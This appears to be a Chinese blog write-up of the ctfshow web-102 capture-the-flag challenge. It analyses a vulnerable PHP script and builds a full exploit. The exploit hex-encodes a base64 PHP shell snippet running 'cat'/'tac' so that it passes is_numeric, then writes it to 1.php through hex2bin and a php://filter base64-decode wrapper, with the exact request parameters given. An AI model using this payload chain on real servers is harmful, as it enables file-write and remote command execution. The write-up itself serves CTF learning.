本文主要是介绍ctfshow-web入门-102,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
这个题我想记录一下,主要是这个方法属实是有点惊艳到我了。故而进行记录,也为了方便大家阅读理解。
看题目,根据题目我写一下我的分析:
$_POST传入一个v1,$_GET传入一个v2,一个v3。
赋值符号= 优先级高于and,所以$v2=$v4
is_numeric — 检测变量是否为数字或数字字符。
bool is_numeric ( mixed
$var
)如果
var
是数字和数字字符串则返回TRUE
,否则返回FALSE
。
substr — 返回字符串的子串
说明
string substr( string $string, int $start[, int $length] )
返回字符串 string 由 start 和 length 参数指定的子字符串。
call_user_func — 把第一个参数作为回调函数调用
说明
mixed call_user_func( callable $callback[, mixed $parameter[, mixed $...]] )
第一个参数 callback 是被调用的回调函数,其余参数是回调函数的参数。
file_put_contents — 将一个字符串写入文件
<?phphighlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){$s = substr($v2,2);$str = call_user_func($v1,$s);echo $str;file_put_contents($v3,$str);
}
else{die('hacker');
}?>
根据上面的函数解释再看一遍源代码。
分析出来:1、 $s = substr($v2,2);由此可知,返回$v2的前三位;
2、$str = call_user_func($v1,$s);由此可知$v1是函数,$s是参数
3、给v3一定要传入一个文件名字,这样才能构造出来一个接受$str的文件
原本我的想法是:$v3传1.php,$v1传system,但是卡在了$v2传不下去了
参考了大师傅的想法和各位万能的网友的wp后,感觉大有所获,来详细分享。
大师傅wp:
$a='<?=`cat *`;';
$b=base64_encode($a); // PD89YGNhdCAqYDs=
$c=bin2hex($b); //这里直接用去掉=的base64
输出的是 5044383959474e6864434171594473
带e的话会被认为是科学计数法,可以通过is_numeric检测。
大家可以尝试下去掉=和带着=的base64解码出来的内容是相同的。因为等号在base64中只是起到填充的作用,不影响具体的数据内容。
所以对应的我们可以反着来
同时在参考大家的wp的时候学到了一个知识点:在以上$c前加11可以使其在base64编码时产生乱码,可以绕过substr的截断,这点真的很重要。
POST传入:?v1=hex2bin //这个是call_user_func的前面那个数,就是用作函数
GET传入:?v2=115044383959474e6864434171594473 //加入11造成base64编码前两位乱码绕过substr截断。
?V3=php://filter/write=convert.base64-decode/resource=1.php //将被转化回去的base64数据再次进行解码,用php协议
hex2bin — 转换十六进制字符串为二进制字符串
bin2hex — 函数把包含数据的二进制字符串转换为十六进制值
总结:
传入参数前:首先构造一个命令----》其次将他base64加密----》然后把base64加密的字符串进行16进制转化
目的:构造一条全是数字的经过层层解密后可执行的数据
传入参数后:将原先的输出的全是数字的命令传入v2,并且加上11,绕过substr截断-----》然后再用v1的hex2bin将数字数据转化成base64数据-----》传入v3文件经过php://filter伪协议进行解密----》执行命令
目的:其实就是一个解密的过程
以下为此方法构造命令的新姿势,只是谈谈思路:
那么已经有了这种思路我们是否能够通过这种思路自己构造命令呢??
当然可行,试试。
构造一条获取f*文件的命令,创建一个1.php文件
$a='<?=`cat f*`;';
$b=base64_encode($a);
$c=bin2hex($b);
执行代码,得到命令。
$a='<?=`cat f*`;';
$b=base64_encode($a);
$c=bin2hex($b);
输出 5044383959474e686443426d4b6d4137不太行,有字母
不死心,再试试
$a='<?=`tac *`;';
$b=base64_encode($a);
$c=bin2hex($b);echo "$c";
输出的c值是504438395948526859794171594473
完美命令达成啦!!!没有字母真的一个也没有!!!
POST:v1=hex2bin
GET:?v2=504438395948526859794171594473&v3=php://filter/write=convert.base64-decode/resource=1.php
但是有点可惜的是并没有把flag回显出来虽然回显出来了东西
还是需要查看源代码才能看到flag,很可惜啊。
如果有师傅能直接回显出来flag的话,真的真的真的,请教教我,谢谢各位师傅啦!!!
这篇关于ctfshow-web入门-102的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!